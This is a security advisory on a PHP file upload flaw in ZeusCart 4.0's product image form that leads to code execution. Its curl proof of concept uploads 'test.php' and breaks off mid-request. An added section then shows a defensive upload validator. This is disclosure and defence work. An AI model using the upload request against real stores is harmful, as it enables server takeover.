ZeusCart 4.0: Code Execution
Security Advisory – Curesec Research Team

1. Introduction

Affected Product:    ZeusCart 4.0
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Contact:      support@zeuscart.com
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  08/13/2015
Disclosed to public: 09/14/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Vulnerability Description

It is possible to upload PHP files when uploading an image for a new product. This leads to code execution once an attacker has gained access to the backend via SQL Injection, CSRF, or XSS. Please note that an admin account with the right to add products is needed.

3. Proof of Concept

curl -i -s -k -X 'POST' \
    -H 'Content-Type: multipart/form-data; boundary=--------1849257448' \
    -b 'PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' \
    --data-binary $'----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0a18\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0a22\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"product_title\"\x0d\x0a\x0d\x0atest\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"desc\"\x0d\x0a\x0d\x0adesc\x0d \x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"sku\"\x0d\x0a\x0d\x0a5\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"txtweight\"\x0d\x0a\x0d\x0a5\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"status\"\x0d\x0a\x0d\x0aon\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"ufile[0]\"; filename=\"test.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a
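The root cause described in section 2 is an image upload that trusts the client-supplied filename and Content-Type (the proof of concept sends `filename="test.php"` with `Content-Type: application/x-php`). The following is an added example of how a product-image upload handler can be written so that such a request is rejected; it is not ZeusCart code and not part of the advisory. The function name `validate_image_upload`, the upload directory `/var/www/uploads` and the way the `ufile[]` array is re-indexed are assumptions for illustration.

```php
<?php
// Added example, not ZeusCart code: allowlist-based validation for a product image upload.
// Assumes a standard PHP $_FILES entry and an upload directory that the web server
// does not execute scripts from (both are assumptions, not taken from the advisory).

function validate_image_upload(array $file, string $uploadDir): string
{
    // Allowed content types, each mapped to the extension the server will assign.
    $allowed = [
        'image/jpeg' => 'jpg',
        'image/png'  => 'png',
        'image/gif'  => 'gif',
    ];

    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file');
    }

    // Decide the type from the bytes on disk, never from the client-supplied
    // filename or multipart Content-Type header.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset($allowed[$mime])) {
        throw new RuntimeException('Unsupported image type: ' . $mime);
    }

    // Require that the file decodes as an image at all.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('File is not a valid image');
    }

    // Server-chosen random name with a server-chosen extension: the original
    // filename (e.g. "test.php") is discarded entirely.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file');
    }
    chmod($dest, 0644); // readable, not executable
    return $name;
}

// Usage in a product-add handler. For a multi-file field named ufile[] (as in
// the advisory's request), PHP nests the arrays as $_FILES['ufile']['name'][0],
// ['tmp_name'][0], ['error'][0], so one entry is re-indexed before validation.
if (isset($_FILES['ufile']['tmp_name'][0])) {
    $entry = [
        'name'     => $_FILES['ufile']['name'][0],
        'tmp_name' => $_FILES['ufile']['tmp_name'][0],
        'error'    => $_FILES['ufile']['error'][0],
    ];
    try {
        $stored = validate_image_upload($entry, '/var/www/uploads'); // assumed path
        echo "stored as " . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo "rejected: " . htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```

Two design points matter here. First, content sniffing alone is not sufficient, because a valid image can carry PHP code in its metadata (a polyglot); the check only becomes robust when the stored file also gets a server-chosen, non-script extension and lives in a directory where the web server is configured not to execute PHP. Second, because the advisory notes that the upload is only reachable with a backend account able to add products, the fix is defence in depth: it keeps a compromised or CSRF-driven admin session from turning a product-image form into a code execution primitive.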